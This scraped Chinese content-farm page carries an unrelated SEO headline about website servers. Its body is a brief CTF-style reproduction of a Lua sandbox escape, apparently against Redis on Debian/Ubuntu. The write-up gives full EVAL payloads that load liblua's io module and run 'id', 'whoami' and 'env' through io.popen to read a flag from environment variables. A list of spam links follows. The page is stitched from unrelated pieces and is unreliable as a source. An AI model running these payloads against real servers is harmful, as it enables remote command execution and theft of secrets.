当前位置: 首页 > news >正文

做网站要用什么服务器简述企业网站如何推广

做网站要用什么服务器,简述企业网站如何推广,c web网站开发视频,网站制作多少钱方案1. 原理 该漏洞的存在是因为Debian/Ubuntu中的Lua库是作为动态库提供的。自动填充了一个package变量,该变量又允许访问任意 Lua 功能。 2.复现 我们可以尝试payload: eval local io_l package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so…

1. 原理

 该漏洞的存在是因为Debian/Ubuntu中的Lua库是作为动态库提供的。自动填充了一个package变量,该变量又允许访问任意 Lua 功能。

2.复现

我们可以尝试payload:

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

在其中local f = io.popen("id", "r")用后面的read去尝试其他命令,修改“id”就可以读取其他内容
查看whoami

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("whoami", "r"); local res = f:read("*a"); f:close(); return res' 0

查看flag,flag在env环境变量中,用读取

 eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("env", "r"); local res = f:read("*a"); f:close(); return res' 0

http://www.yidumall.com/news/102172.html

相关文章:

  • 电子商务网站建设工具谷歌浏览器引擎入口
  • 在阿里云上做网站步骤福州网络推广运营
  • wordpress静态化设置鸡西seo顾问
  • 佛山营销网站设计长沙网站推广seo
  • 什么网站做专利检索报告怎样制作一个网页
  • 古城网站建设谈谈对seo的理解
  • seo短视频网页入口引流动漫长沙seo网站排名优化公司
  • 网站框架怎么做灰色词排名推广
  • 有FTP免费网站seo流量是什么意思
  • 网站收录时有时没有seo技术博客
  • 用nas做网站每日新闻摘抄10条
  • python网站开发简单吗百度引擎入口官网
  • 龙华网站优化欧美seo查询
  • 阿里巴巴做网站吗杭州网站优化搜索
  • 阿里云 做购物网站网站湖南网站建设seo
  • 网站建设平台代理南京seo关键词排名
  • 深圳网站建设与制作公司搜索引擎关键词怎么选
  • 小学网站建设优化师
  • 品牌网站建设创意新颖什么平台可以推销自己的产品
  • 白云区住房和建设水务局网站百度搜索引擎营销如何实现
  • 网站被做301怎么被百度收录
  • 定制网站建设费用网络营销工作内容和职责
  • 全国高风险和中风险地区名单东莞网站优化公司
  • 科技部网站建设合同市场营销专业
  • 做动态网站什么语言好上海sem
  • 我自己的网站 怎样做防火墙企业推广策略
  • 我想卖自己做的鞋子 上哪个网站好关键词优化排名首页
  • 经营性网站备案时间百度搜索引擎优化方式
  • 测试页面网站建设拉新推广一手接单平台
  • wordpress bat高亮谷歌搜索引擎优化